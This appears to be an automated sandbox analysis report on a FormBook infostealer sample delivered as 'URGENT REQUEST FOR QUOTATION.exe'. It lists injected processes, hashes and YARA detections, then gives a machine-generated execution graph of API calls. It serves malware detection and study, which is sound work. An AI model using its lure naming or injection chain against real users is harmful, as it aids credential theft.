                                                                                                                    Path:C:\Windows\SysWOW64\svchost.exe
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:"C:\Users\user\Desktop\URGENT REQUEST FOR QUOTATION.exe"
                                                                                                                    Imagebase:0x1e0000
                                                                                                                    File size:46'504 bytes
                                                                                                                    MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Yara matches:
                                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.2075405334.0000000003010000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.2075405334.0000000003010000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.2075121033.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.2075121033.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.2075735813.0000000004200000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.2075735813.0000000004200000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                    Reputation:high
                                                                                                                    Has exited:true

                                                                                                                    Target ID:5
                                                                                                                    Start time:14:58:32
                                                                                                                    Start date:02/11/2024
                                                                                                                    Path:C:\Program Files (x86)\usqznWXOKvyIPkNnzHpCzicejZHhYkGDUazjvSeBK\iadfuWOlEqeEML.exe
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:"C:\Program Files (x86)\usqznWXOKvyIPkNnzHpCzicejZHhYkGDUazjvSeBK\iadfuWOlEqeEML.exe"
                                                                                                                    Imagebase:0xc70000
                                                                                                                    File size:140'800 bytes
                                                                                                                    MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                    Has elevated privileges:false
                                                                                                                    Has administrator privileges:false
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Yara matches:
                                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.4129751866.0000000003670000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.4129751866.0000000003670000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                                                                                    Reputation:high
                                                                                                                    Has exited:false

                                                                                                                    Target ID:6
                                                                                                                    Start time:14:58:33
                                                                                                                    Start date:02/11/2024
                                                                                                                    Path:C:\Windows\SysWOW64\notepad.exe
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:"C:\Windows\SysWOW64\notepad.exe"
                                                                                                                    Imagebase:0x4f0000
                                                                                                                    File size:165'888 bytes
                                                                                                                    MD5 hash:E92D3A824A0578A50D2DD81B5060145F
                                                                                                                    Has elevated privileges:false
                                                                                                                    Has administrator privileges:false
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Yara matches:
                                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.4128947956.0000000002F50000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.4128947956.0000000002F50000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.4128861229.0000000002F00000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.4128861229.0000000002F00000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.4128488023.0000000002990000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.4128488023.0000000002990000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                    Reputation:moderate
                                                                                                                    Has exited:false

                                                                                                                    Target ID:8
                                                                                                                    Start time:14:58:47
                                                                                                                    Start date:02/11/2024
                                                                                                                    Path:C:\Program Files (x86)\usqznWXOKvyIPkNnzHpCzicejZHhYkGDUazjvSeBK\iadfuWOlEqeEML.exe
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:"C:\Program Files (x86)\usqznWXOKvyIPkNnzHpCzicejZHhYkGDUazjvSeBK\iadfuWOlEqeEML.exe"
                                                                                                                    Imagebase:0xc70000
                                                                                                                    File size:140'800 bytes
                                                                                                                    MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                    Has elevated privileges:false
                                                                                                                    Has administrator privileges:false
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Yara matches:
                                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.4131591003.00000000051C0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000002.4131591003.00000000051C0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                    Reputation:high
                                                                                                                    Has exited:false

                                                                                                                    Target ID:9
                                                                                                                    Start time:14:59:04
                                                                                                                    Start date:02/11/2024
                                                                                                                    Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                    Wow64 process (32bit):false
                                                                                                                    Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                                                                    Imagebase:0x7ff6bf500000
                                                                                                                    File size:676'768 bytes
                                                                                                                    MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                                                                    Has elevated privileges:false
                                                                                                                    Has administrator privileges:false
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Reputation:high
                                                                                                                    Has exited:true

                                                                                                                    Reset < >

                                                                                                                      Execution Graph

                                                                                                                      Execution Coverage:2.9%
                                                                                                                      Dynamic/Decrypted Code Coverage:1%
                                                                                                                      Signature Coverage:3%
                                                                                                                      Total number of Nodes:1652
                                                                                                                      Total number of Limit Nodes:49
                                                                                                                      execution_graph 96323 32de3 96324 32df0 __wsopen_s 96323->96324 96325 32e09 96324->96325 96326 72c2b ___scrt_fastfail 96324->96326 96339 33aa2 96325->96339 96328 72c47 GetOpenFileNameW 96326->96328 96330 72c96 96328->96330 96397 36b57 96330->96397 96334 72cab 96334->96334 96336 32e27 96367 344a8 96336->96367 96409 71f50 96339->96409 96342 33ae9 96415 3a6c3 96342->96415 96343 33ace 96344 36b57 22 API calls 96343->96344 96346 33ada 96344->96346 96411 337a0 96346->96411 96349 32da5 96350 71f50 __wsopen_s 96349->96350 96351 32db2 GetLongPathNameW 96350->96351 96352 36b57 22 API calls 96351->96352 96353 32dda 96352->96353 96354 33598 96353->96354 96466 3a961 96354->96466 96357 33aa2 23 API calls 96358 335b5 96357->96358 96359 335c0 96358->96359 96360 732eb 96358->96360 96471 3515f 96359->96471 96365 7330d 96360->96365 96483 4ce60 41 API calls 96360->96483 96366 335df 96366->96336 96484 34ecb 96367->96484 96370 73833 96506 a2cf9 96370->96506 96372 34ecb 94 API calls 96374 344e1 96372->96374 96373 73848 96375 7384c 96373->96375 96376 73869 96373->96376 96374->96370 96377 344e9 96374->96377 96556 34f39 96375->96556 96381 4fe0b 22 API calls 96376->96381 96378 73854 96377->96378 96379 344f5 96377->96379 96562 9da5a 82 API calls 96378->96562 96555 3940c 136 API calls 2 library calls 96379->96555 96396 738ae 96381->96396 96384 32e31 96385 73862 96385->96376 96386 73a5f 96392 73a67 96386->96392 96387 34f39 68 API calls 96387->96392 96392->96387 96564 9989b 82 API calls __wsopen_s 96392->96564 96393 39cb3 22 API calls 96393->96396 96396->96386 96396->96392 96396->96393 96532 9967e 96396->96532 96535 a0b5a 96396->96535 96541 3a4a1 96396->96541 96549 33ff7 96396->96549 96563 995ad 42 API calls _wcslen 96396->96563 96398 36b67 _wcslen 96397->96398 96399 74ba1 96397->96399 96402 36ba2 96398->96402 96403 36b7d 96398->96403 96400 393b2 22 API calls 96399->96400 96401 74baa 96400->96401 96401->96401 96404 4fddb 22 API calls 96402->96404 96910 36f34 22 API calls 96403->96910 96406 36bae 96404->96406 96408 4fe0b 22 API calls 96406->96408 96407 36b85 __fread_nolock 96407->96334 96408->96407 96410 33aaf GetFullPathNameW 96409->96410 96410->96342 96410->96343 96412 337ae 96411->96412 96421 393b2 96412->96421 96414 32e12 96414->96349 96416 3a6d0 96415->96416 96417 3a6dd 96415->96417 96416->96346 96418 4fddb 22 API calls 96417->96418 96419 3a6e7 96418->96419 96420 4fe0b 22 API calls 96419->96420 96420->96416 96422 393c0 96421->96422 96423 393c9 __fread_nolock 96421->96423 96422->96423 96425 3aec9 96422->96425 96423->96414 96423->96423 96426 3aed9 __fread_nolock 96425->96426 96427 3aedc 96425->96427 96426->96423 96431 4fddb 96427->96431 96429 3aee7 96441 4fe0b 96429->96441 96433 4fde0 96431->96433 96434 4fdfa 96433->96434 96437 4fdfc 96433->96437 96451 5ea0c 96433->96451 96458 54ead 7 API calls 2 library calls 96433->96458 96434->96429 96436 5066d 96460 532a4 RaiseException 96436->96460 96437->96436 96459 532a4 RaiseException 96437->96459 96439 5068a 96439->96429 96443 4fddb 96441->96443 96442 5ea0c ___std_exception_copy 21 API calls 96442->96443 96443->96442 96444 4fdfa 96443->96444 96446 4fdfc 96443->96446 96463 54ead 7 API calls 2 library calls 96443->96463 96444->96426 96447 5066d 96446->96447 96464 532a4 RaiseException 96446->96464 96465 532a4 RaiseException 96447->96465 96449 5068a 96449->96426 96456 63820 FindHandler 96451->96456 96452 6385e 96462 5f2d9 20 API calls _free 96452->96462 96454 63849 RtlAllocateHeap 96455 6385c 96454->96455 96454->96456 96455->96433 96456->96452 96456->96454 96461 54ead 7 API calls 2 library calls 96456->96461 96458->96433 96459->96436 96460->96439 96461->96456 96462->96455 96463->96443 96464->96447 96465->96449 96467 4fe0b 22 API calls 96466->96467 96468 3a976 96467->96468 96469 4fddb 22 API calls 96468->96469 96470 335aa 96469->96470 96470->96357 96472 3516e 96471->96472 96476 3518f __fread_nolock 96471->96476 96474 4fe0b 22 API calls 96472->96474 96473 4fddb 22 API calls 96475 335cc 96473->96475 96474->96476 96477 335f3 96475->96477 96476->96473 96478 33605 96477->96478 96482 33624 __fread_nolock 96477->96482 96480 4fe0b 22 API calls 96478->96480 96479 4fddb 22 API calls 96481 3363b 96479->96481 96480->96482 96481->96366 96482->96479 96483->96360 96565 34e90 LoadLibraryA 96484->96565 96489 34ef6 LoadLibraryExW 96573 34e59 LoadLibraryA 96489->96573 96490 73ccf 96491 34f39 68 API calls 96490->96491 96493 73cd6 96491->96493 96495 34e59 3 API calls 96493->96495 96497 73cde 96495->96497 96595 350f5 96497->96595 96498 34f20 96498->96497 96499 34f2c 96498->96499 96501 34f39 68 API calls 96499->96501 96502 344cd 96501->96502 96502->96370 96502->96372 96505 73d05 96507 a2d15 96506->96507 96508 3511f 64 API calls 96507->96508 96509 a2d29 96508->96509 96738 a2e66 96509->96738 96512 350f5 40 API calls 96513 a2d56 96512->96513 96514 350f5 40 API calls 96513->96514 96515 a2d66 96514->96515 96516 350f5 40 API calls 96515->96516 96517 a2d81 96516->96517 96518 350f5 40 API calls 96517->96518 96519 a2d9c 96518->96519 96520 3511f 64 API calls 96519->96520 96521 a2db3 96520->96521 96522 5ea0c ___std_exception_copy 21 API calls 96521->96522 96523 a2dba 96522->96523 96524 5ea0c ___std_exception_copy 21 API calls 96523->96524 96525 a2dc4 96524->96525 96526 350f5 40 API calls 96525->96526 96527 a2dd8 96526->96527 96528 a28fe 27 API calls 96527->96528 96530 a2dee 96528->96530 96529 a2d3f 96529->96373 96530->96529 96744 a22ce 96530->96744 96533 4fe0b 22 API calls 96532->96533 96534 996ae __fread_nolock 96533->96534 96534->96396 96536 a0b65 96535->96536 96537 4fddb 22 API calls 96536->96537 96538 a0b7c 96537->96538 96904 39cb3 96538->96904 96543 3a52b 96541->96543 96548 3a4b1 __fread_nolock 96541->96548 96542 4fddb 22 API calls 96544 3a4b8 96542->96544 96545 4fe0b 22 API calls 96543->96545 96546 4fddb 22 API calls 96544->96546 96547 3a4d6 96544->96547 96545->96548 96546->96547 96547->96396 96548->96542 96550 3400a 96549->96550 96553 340ae 96549->96553 96551 4fe0b 22 API calls 96550->96551 96554 3403c 96550->96554 96551->96554 96552 4fddb 22 API calls 96552->96554 96553->96396 96554->96552 96554->96553 96555->96384 96557 34f43 96556->96557 96558 34f4a 96556->96558 96559 5e678 67 API calls 96557->96559 96560 34f6a FreeLibrary 96558->96560 96561 34f59 96558->96561 96559->96558 96560->96561 96561->96378 96562->96385 96563->96396 96564->96392 96566 34ec6 96565->96566 96567 34ea8 GetProcAddress 96565->96567 96570 5e5eb 96566->96570 96568 34eb8 96567->96568 96568->96566 96569 34ebf FreeLibrary 96568->96569 96569->96566 96603 5e52a 96570->96603 96572 34eea 96572->96489 96572->96490 96574 34e6e GetProcAddress 96573->96574 96575 34e8d 96573->96575 96576 34e7e 96574->96576 96578 34f80 96575->96578 96576->96575 96577 34e86 FreeLibrary 96576->96577 96577->96575 96579 4fe0b 22 API calls 96578->96579 96580 34f95 96579->96580 96664 35722 96580->96664 96582 34fa1 __fread_nolock 96583 350a5 96582->96583 96584 73d1d 96582->96584 96594 34fdc 96582->96594 96667 342a2 CreateStreamOnHGlobal 96583->96667 96678 a304d 74 API calls 96584->96678 96587 73d22 96589 3511f 64 API calls 96587->96589 96588 350f5 40 API calls 96588->96594 96590 73d45 96589->96590 96591 350f5 40 API calls 96590->96591 96593 3506e messages 96591->96593 96593->96498 96594->96587 96594->96588 96594->96593 96673 3511f 96594->96673 96596 35107 96595->96596 96597 73d70 96595->96597 96700 5e8c4 96596->96700 96600 a28fe 96721 a274e 96600->96721 96602 a2919 96602->96505 96606 5e536 ___BuildCatchObject 96603->96606 96604 5e544 96628 5f2d9 20 API calls _free 96604->96628 96606->96604 96608 5e574 96606->96608 96607 5e549 96629 627ec 26 API calls ___std_exception_copy 96607->96629 96609 5e586 96608->96609 96610 5e579 96608->96610 96620 68061 96609->96620 96630 5f2d9 20 API calls _free 96610->96630 96614 5e58f 96615 5e595 96614->96615 96617 5e5a2 96614->96617 96631 5f2d9 20 API calls _free 96615->96631 96632 5e5d4 LeaveCriticalSection __fread_nolock 96617->96632 96619 5e554 __fread_nolock 96619->96572 96621 6806d ___BuildCatchObject 96620->96621 96633 62f5e EnterCriticalSection 96621->96633 96623 6807b 96634 680fb 96623->96634 96627 680ac __fread_nolock 96627->96614 96628->96607 96629->96619 96630->96619 96631->96619 96632->96619 96633->96623 96642 6811e 96634->96642 96635 68088 96648 680b7 96635->96648 96636 68177 96653 64c7d 20 API calls 2 library calls 96636->96653 96639 68180 96654 629c8 96639->96654 96641 68189 96641->96635 96660 63405 11 API calls 2 library calls 96641->96660 96642->96635 96642->96636 96642->96642 96651 5918d EnterCriticalSection 96642->96651 96652 591a1 LeaveCriticalSection 96642->96652 96644 681a8 96661 5918d EnterCriticalSection 96644->96661 96647 681bb 96647->96635 96663 62fa6 LeaveCriticalSection 96648->96663 96650 680be 96650->96627 96651->96642 96652->96642 96653->96639 96655 629d3 RtlFreeHeap 96654->96655 96659 629fc _free 96654->96659 96656 629e8 96655->96656 96655->96659 96662 5f2d9 20 API calls _free 96656->96662 96658 629ee GetLastError 96658->96659 96659->96641 96660->96644 96661->96647 96662->96658 96663->96650 96665 4fddb 22 API calls 96664->96665 96666 35734 96665->96666 96666->96582 96668 342bc FindResourceExW 96667->96668 96672 342d9 96667->96672 96669 735ba LoadResource 96668->96669 96668->96672 96670 735cf SizeofResource 96669->96670 96669->96672 96671 735e3 LockResource 96670->96671 96670->96672 96671->96672 96672->96594 96674 73d90 96673->96674 96675 3512e 96673->96675 96679 5ece3 96675->96679 96678->96587 96682 5eaaa 96679->96682 96681 3513c 96681->96594 96685 5eab6 ___BuildCatchObject 96682->96685 96683 5eac2 96695 5f2d9 20 API calls _free 96683->96695 96685->96683 96686 5eae8 96685->96686 96697 5918d EnterCriticalSection 96686->96697 96688 5eac7 96696 627ec 26 API calls ___std_exception_copy 96688->96696 96689 5eaf4 96698 5ec0a 62 API calls 2 library calls 96689->96698 96692 5eb08 96699 5eb27 LeaveCriticalSection __fread_nolock 96692->96699 96693 5ead2 __fread_nolock 96693->96681 96695->96688 96696->96693 96697->96689 96698->96692 96699->96693 96703 5e8e1 96700->96703 96702 35118 96702->96600 96704 5e8ed ___BuildCatchObject 96703->96704 96705 5e900 ___scrt_fastfail 96704->96705 96706 5e92d 96704->96706 96707 5e925 __fread_nolock 96704->96707 96716 5f2d9 20 API calls _free 96705->96716 96718 5918d EnterCriticalSection 96706->96718 96707->96702 96709 5e937 96719 5e6f8 38 API calls 4 library calls 96709->96719 96711 5e91a 96717 627ec 26 API calls ___std_exception_copy 96711->96717 96714 5e94e 96720 5e96c LeaveCriticalSection __fread_nolock 96714->96720 96716->96711 96717->96707 96718->96709 96719->96714 96720->96707 96724 5e4e8 96721->96724 96723 a275d 96723->96602 96727 5e469 96724->96727 96726 5e505 96726->96723 96728 5e478 96727->96728 96730 5e48c 96727->96730 96735 5f2d9 20 API calls _free 96728->96735 96734 5e488 __alldvrm 96730->96734 96737 6333f 11 API calls 2 library calls 96730->96737 96731 5e47d 96736 627ec 26 API calls ___std_exception_copy 96731->96736 96734->96726 96735->96731 96736->96734 96737->96734 96743 a2e7a 96738->96743 96739 a2d3b 96739->96512 96739->96529 96740 350f5 40 API calls 96740->96743 96741 a28fe 27 API calls 96741->96743 96742 3511f 64 API calls 96742->96743 96743->96739 96743->96740 96743->96741 96743->96742 96745 a22e7 96744->96745 96746 a22d9 96744->96746 96748 a232c 96745->96748 96749 5e5eb 29 API calls 96745->96749 96760 a22f0 96745->96760 96747 5e5eb 29 API calls 96746->96747 96747->96745 96773 a2557 40 API calls __fread_nolock 96748->96773 96750 a2311 96749->96750 96750->96748 96752 a231a 96750->96752 96752->96760 96781 5e678 96752->96781 96753 a2370 96754 a2374 96753->96754 96755 a2395 96753->96755 96756 a2381 96754->96756 96759 5e678 67 API calls 96754->96759 96774 a2171 96755->96774 96756->96760 96762 5e678 67 API calls 96756->96762 96759->96756 96760->96529 96761 a239d 96763 a23c3 96761->96763 96765 a23a3 96761->96765 96762->96760 96794 a23f3 74 API calls 96763->96794 96766 a23b0 96765->96766 96767 5e678 67 API calls 96765->96767 96766->96760 96768 5e678 67 API calls 96766->96768 96767->96766 96768->96760 96769 a23de 96769->96760 96772 5e678 67 API calls 96769->96772 96770 a23ca 96770->96769 96771 5e678 67 API calls 96770->96771 96771->96769 96772->96760 96773->96753 96775 5ea0c ___std_exception_copy 21 API calls 96774->96775 96776 a217f 96775->96776 96777 5ea0c ___std_exception_copy 21 API calls 96776->96777 96778 a2190 96777->96778 96779 5ea0c ___std_exception_copy 21 API calls 96778->96779 96780 a219c 96779->96780 96780->96761 96782 5e684 ___BuildCatchObject 96781->96782 96783 5e695 96782->96783 96784 5e6aa 96782->96784 96812 5f2d9 20 API calls _free 96783->96812 96786 5e6a5 __fread_nolock 96784->96786 96795 5918d EnterCriticalSection 96784->96795 96786->96760 96788 5e69a 96813 627ec 26 API calls ___std_exception_copy 96788->96813 96789 5e6c6 96796 5e602 96789->96796 96792 5e6d1 96814 5e6ee LeaveCriticalSection __fread_nolock 96792->96814 96794->96770 96795->96789 96797 5e624 96796->96797 96798 5e60f 96796->96798 96805 5e61f 96797->96805 96815 5dc0b 96797->96815 96847 5f2d9 20 API calls _free 96798->96847 96801 5e614 96848 627ec 26 API calls ___std_exception_copy 96801->96848 96805->96792 96808 5e646 96832 6862f 96808->96832 96811 629c8 _free 20 API calls 96811->96805 96812->96788 96813->96786 96814->96786 96816 5dc23 96815->96816 96817 5dc1f 96815->96817 96816->96817 96818 5d955 __fread_nolock 26 API calls 96816->96818 96821 64d7a 96817->96821 96819 5dc43 96818->96819 96849 659be 62 API calls 6 library calls 96819->96849 96822 5e640 96821->96822 96823 64d90 96821->96823 96825 5d955 96822->96825 96823->96822 96824 629c8 _free 20 API calls 96823->96824 96824->96822 96826 5d976 96825->96826 96827 5d961 96825->96827 96826->96808 96850 5f2d9 20 API calls _free 96827->96850 96829 5d966 96851 627ec 26 API calls ___std_exception_copy 96829->96851 96831 5d971 96831->96808 96833 6863e 96832->96833 96837 68653 96832->96837 96855 5f2c6 20 API calls _free 96833->96855 96835 6868e 96857 5f2c6 20 API calls _free 96835->96857 96836 68643 96856 5f2d9 20 API calls _free 96836->96856 96837->96835 96840 6867a 96837->96840 96852 68607 96840->96852 96841 68693 96858 5f2d9 20 API calls _free 96841->96858 96844 6869b 96859 627ec 26 API calls ___std_exception_copy 96844->96859 96845 5e64c 96845->96805 96845->96811 96847->96801 96848->96805 96849->96817 96850->96829 96851->96831 96860 68585 96852->96860 96854 6862b 96854->96845 96855->96836 96856->96845 96857->96841 96858->96844 96859->96845 96861 68591 ___BuildCatchObject 96860->96861 96871 65147 EnterCriticalSection 96861->96871 96863 6859f 96864 685c6 96863->96864 96865 685d1 96863->96865 96872 686ae 96864->96872 96887 5f2d9 20 API calls _free 96865->96887 96868 685cc 96888 685fb LeaveCriticalSection __wsopen_s 96868->96888 96870 685ee __fread_nolock 96870->96854 96871->96863 96889 653c4 96872->96889 96874 686c4 96902 65333 21 API calls 3 library calls 96874->96902 96875 686be 96875->96874 96876 686f6 96875->96876 96878 653c4 __wsopen_s 26 API calls 96875->96878 96876->96874 96879 653c4 __wsopen_s 26 API calls 96876->96879 96881 686ed 96878->96881 96882 68702 CloseHandle 96879->96882 96880 6871c 96883 6873e 96880->96883 96903 5f2a3 20 API calls 2 library calls 96880->96903 96884 653c4 __wsopen_s 26 API calls 96881->96884 96882->96874 96885 6870e GetLastError 96882->96885 96883->96868 96884->96876 96885->96874 96887->96868 96888->96870 96890 653e6 96889->96890 96891 653d1 96889->96891 96893 5f2c6 __dosmaperr 20 API calls 96890->96893 96895 6540b 96890->96895 96892 5f2c6 __dosmaperr 20 API calls 96891->96892 96894 653d6 96892->96894 96896 65416 96893->96896 96897 5f2d9 _free 20 API calls 96894->96897 96895->96875 96898 5f2d9 _free 20 API calls 96896->96898 96899 653de 96897->96899 96900 6541e 96898->96900 96899->96875 96901 627ec ___std_exception_copy 26 API calls 96900->96901 96901->96899 96902->96880 96903->96883 96905 39cc2 _wcslen 96904->96905 96906 4fe0b 22 API calls 96905->96906 96907 39cea __fread_nolock 96906->96907 96908 4fddb 22 API calls 96907->96908 96909 39d00 96908->96909 96909->96396 96910->96407 96911 72ba5 96912 32b25 96911->96912 96913 72baf 96911->96913 96939 32b83 7 API calls 96912->96939 96954 33a5a 96913->96954 96917 72bb8 96919 39cb3 22 API calls 96917->96919 96921 72bc6 96919->96921 96920 32b2f 96922 32b44 96920->96922 96943 33837 96920->96943 96923 72bf5 96921->96923 96924 72bce 96921->96924 96931 32b5f 96922->96931 96953 330f2 Shell_NotifyIconW ___scrt_fastfail 96922->96953 96926 333c6 22 API calls 96923->96926 96961 333c6 96924->96961 96938 72bf1 GetForegroundWindow ShellExecuteW 96926->96938 96935 32b66 SetCurrentDirectoryW 96931->96935 96934 72c26 96934->96931 96937 32b7a 96935->96937 96936 333c6 22 API calls 96936->96938 96938->96934 96979 32cd4 7 API calls 96939->96979 96941 32b2a 96942 32c63 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 96941->96942 96942->96920 96944 33862 ___scrt_fastfail 96943->96944 96980 34212 96944->96980 96947 338e8 96949 73386 Shell_NotifyIconW 96947->96949 96950 33906 Shell_NotifyIconW 96947->96950 96984 33923 96950->96984 96952 3391c 96952->96922 96953->96931 96955 71f50 __wsopen_s 96954->96955 96956 33a67 GetModuleFileNameW 96955->96956 96957 39cb3 22 API calls 96956->96957 96958 33a8d 96957->96958 96959 33aa2 23 API calls 96958->96959 96960 33a97 96959->96960 96960->96917 96962 730bb 96961->96962 96963 333dd 96961->96963 96965 4fddb 22 API calls 96962->96965 97013 333ee 96963->97013 96967 730c5 _wcslen 96965->96967 96966 333e8 96970 36350 96966->96970 96968 4fe0b 22 API calls 96967->96968 96969 730fe __fread_nolock 96968->96969 96971 36362 96970->96971 96972 74a51 96970->96972 97028 36373 96971->97028 97038 34a88 22 API calls __fread_nolock 96972->97038 96975 3636e 96975->96936 96976 74a5b 96977 74a67 96976->96977 97039 3a8c7 22 API calls __fread_nolock 96976->97039 96979->96941 96981 735a4 96980->96981 96982 338b7 96980->96982 96981->96982 96983 735ad DestroyIcon 96981->96983 96982->96947 97006 9c874 42 API calls _strftime 96982->97006 96983->96982 96985 3393f 96984->96985 97004 33a13 96984->97004 97007 36270 96985->97007 96988 73393 LoadStringW 96992 733ad 96988->96992 96989 3395a 96990 36b57 22 API calls 96989->96990 96991 3396f 96990->96991 96993 733c9 96991->96993 96994 3397c 96991->96994 97000 33994 ___scrt_fastfail 96992->97000 97012 3a8c7 22 API calls __fread_nolock 96992->97012 96997 36350 22 API calls 96993->96997 96994->96992 96996 33986 96994->96996 96998 36350 22 API calls 96996->96998 96999 733d7 96997->96999 96998->97000 96999->97000 97001 333c6 22 API calls 96999->97001 97002 339f9 Shell_NotifyIconW 97000->97002 97003 733f9 97001->97003 97002->97004 97005 333c6 22 API calls 97003->97005 97004->96952 97005->97000 97006->96947 97008 4fe0b 22 API calls 97007->97008 97009 36295 97008->97009 97010 4fddb 22 API calls 97009->97010 97011 3394d 97010->97011 97011->96988 97011->96989 97012->97000 97014 333fe _wcslen 97013->97014 97015 33411 97014->97015 97016 7311d 97014->97016 97023 3a587 97015->97023 97017 4fddb 22 API calls 97016->97017 97019 73127 97017->97019 97021 4fe0b 22 API calls 97019->97021 97020 3341e __fread_nolock 97020->96966 97022 73157 __fread_nolock 97021->97022 97024 3a59d 97023->97024 97027 3a598 __fread_nolock 97023->97027 97025 7f80f 97024->97025 97026 4fe0b 22 API calls 97024->97026 97026->97027 97027->97020 97029 36382 97028->97029 97035 363b6 __fread_nolock 97028->97035 97030 74a82 97029->97030 97031 363a9 97029->97031 97029->97035 97033 4fddb 22 API calls 97030->97033 97032 3a587 22 API calls 97031->97032 97032->97035 97034 74a91 97033->97034 97036 4fe0b 22 API calls 97034->97036 97035->96975 97037 74ac5 __fread_nolock 97036->97037 97038->96976 97039->96977 97040 3ddc0 97043 3aa19 97040->97043 97042 3ddcc 97044 3aa3a 97043->97044 97045 3aa8f 97043->97045 97044->97045 97052 3ec40 97044->97052 97050 3aabe 97045->97050 97086 a359c 82 API calls __wsopen_s 97045->97086 97048 3aa6b 97048->97050 97076 3aceb 97048->97076 97049 7f907 97049->97049 97050->97042 97071 3ec76 messages 97052->97071 97053 4fddb 22 API calls 97053->97071 97055 3fef7 97068 3ed9d messages 97055->97068 97090 3a8c7 22 API calls __fread_nolock 97055->97090 97057 84600 97057->97068 97089 3a8c7 22 API calls __fread_nolock 97057->97089 97058 84b0b 97092 a359c 82 API calls __wsopen_s 97058->97092 97062 50242 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 97062->97071 97063 3a8c7 22 API calls 97063->97071 97066 3fbe3 97066->97068 97069 84bdc 97066->97069 97075 3f3ae messages 97066->97075 97067 3a961 22 API calls 97067->97071 97068->97048 97093 a359c 82 API calls __wsopen_s 97069->97093 97070 500a3 29 API calls pre_c_initialization 97070->97071 97071->97053 97071->97055 97071->97057 97071->97058 97071->97062 97071->97063 97071->97066 97071->97067 97071->97068 97071->97070 97073 84beb 97071->97073 97074 501f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent __Init_thread_footer 97071->97074 97071->97075 97087 401e0 207 API calls 2 library calls 97071->97087 97088 406a0 41 API calls messages 97071->97088 97094 a359c 82 API calls __wsopen_s 97073->97094 97074->97071 97075->97068 97091 a359c 82 API calls __wsopen_s 97075->97091 97077 3acf9 97076->97077 97085 3ad2a messages 97076->97085 97078 3ad55 97077->97078 97080 3ad01 messages 97077->97080 97078->97085 97095 3a8c7 22 API calls __fread_nolock 97078->97095 97081 3ad21 97080->97081 97082 7fa48 97080->97082 97080->97085 97083 7fa3a VariantClear 97081->97083 97081->97085 97082->97085 97096 4ce17 22 API calls messages 97082->97096 97083->97085 97085->97045 97086->97049 97087->97071 97088->97071 97089->97068 97090->97068 97091->97068 97092->97068 97093->97073 97094->97068 97095->97085 97096->97085 97097 68402 97102 681be 97097->97102 97100 6842a 97107 681ef try_get_first_available_module 97102->97107 97104 683ee 97121 627ec 26 API calls ___std_exception_copy 97104->97121 97106 68343 97106->97100 97114 70984 97106->97114 97113 68338 97107->97113 97117 58e0b 40 API calls 2 library calls 97107->97117 97109 6838c 97109->97113 97118 58e0b 40 API calls 2 library calls 97109->97118 97111 683ab 97111->97113 97119 58e0b 40 API calls 2 library calls 97111->97119 97113->97106 97120 5f2d9 20 API calls _free 97113->97120 97122 70081 97114->97122 97116 7099f 97116->97100 97117->97109 97118->97111 97119->97113 97120->97104 97121->97106 97124 7008d ___BuildCatchObject 97122->97124 